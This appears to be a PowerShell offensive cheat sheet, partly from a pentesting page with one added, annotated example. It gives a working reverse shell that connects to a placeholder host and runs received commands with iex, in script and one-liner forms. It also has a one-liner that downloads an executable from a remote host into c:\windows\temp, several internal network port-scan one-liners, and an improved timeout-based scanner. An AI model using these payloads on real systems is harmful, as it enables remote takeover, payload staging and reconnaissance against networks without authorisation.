PowerShell reverse shell (reads commands from the socket, runs them with iex, and writes the output back; note that both directions use ASCII, so any non-ASCII characters in command output are mangled):
$client=New-Object Net.Sockets.TCPClient('x.x.x.x',22); $stream=$client.GetStream(); [byte[]]$bytes=0..65535|%{0}; while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){; $data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback=(iex $data 2>&1 | Out-String); $sendback2=$sendback + 'PS ' + (pwd).Path + '> '; $sendbyte=([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()
The same thing as a single command line:
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('x.x.x.x',8888);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PowerShell file download (System.Net.WebClient, saving to c:\windows\temp):
powershell -nop -c "$client=new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x/o.exe', 'c:\windows\temp\o.exe')"
PowerShell port scan of a single internal host (a failed Connect() throws, which 2>$null hides; every closed or filtered port waits for the full TCP connect timeout, so this is slow):
1..9999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.1",$_)) "Port $_ is open!"} 2>$null
PowerShell scan of an internal /24 for a single port (Test-NetConnection needs Windows 8 / Server 2012 or later):
foreach ($ip in 1..255) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
Scan a port range across an IP range (nested version of the single-host loop):
1..255 | % { $a = $_; 1..999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.$a",$_)) "Port $_ is open!"} 2>$null}
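The three scanning one-liners above all rely on a blocking Connect() and therefore pay the full OS connect timeout (roughly 21 seconds on Windows) for each filtered port, which makes a /24 times a port range impractical. The following is an added example, not code from the original page, that performs the same TCP connect scan with a short per-port timeout via BeginConnect and an AsyncWaitHandle wait. The 192.168.0.0/24 range, the 300 ms timeout and the default port list are assumptions chosen for illustration.

```powershell
# Added example (not from the original page): TCP connect scan with a per-port
# timeout. Assumptions: target prefix 192.168.0., 300 ms timeout, default port list.

function Test-TcpPort {
    param(
        [Parameter(Mandatory)] [string] $Ip,
        [Parameter(Mandatory)] [int]    $Port,
        [int] $TimeoutMs = 300
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        # Start the connect without blocking, then wait at most $TimeoutMs for it.
        $async = $client.BeginConnect($Ip, $Port, $null, $null)
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) {
            # Timeout: no SYN-ACK and no RST within the window -> treat as filtered/closed
            return $false
        }
        # EndConnect throws on RST (closed port); that lands in the catch below.
        $client.EndConnect($async)
        return $client.Connected
    } catch {
        return $false
    } finally {
        # Close() also cancels a still-pending BeginConnect after a timeout.
        $client.Close()
    }
}

function Invoke-TcpScan {
    param(
        [Parameter(Mandatory)] [string] $Prefix,           # e.g. "192.168.0."
        [int[]] $Hosts = 1..254,
        [int[]] $Ports = @(21, 22, 80, 135, 139, 443, 445, 3389),
        [int]   $TimeoutMs = 300
    )
    foreach ($h in $Hosts) {
        $ip = "$Prefix$h"
        foreach ($p in $Ports) {
            if (Test-TcpPort -Ip $ip -Port $p -TimeoutMs $TimeoutMs) {
                # Emit objects rather than strings so the result can be sorted/exported
                [pscustomobject]@{ Host = $ip; Port = $p; State = 'open' }
            }
        }
    }
}

# Usage (equivalent of the one-liners above, but bounded by the timeout):
# single host, ports 1-1024
1..1024 | ForEach-Object { if (Test-TcpPort -Ip '192.168.0.1' -Port $_) { "Port $_ is open!" } }
# whole /24 on the default port list, as a table
Invoke-TcpScan -Prefix '192.168.0.' | Format-Table -AutoSize
```

Lowering the timeout below the network's round-trip time produces false negatives, so pick it from an observed RTT to a known-open port before scanning; on a LAN 300 ms is generous, across a VPN several seconds may be needed.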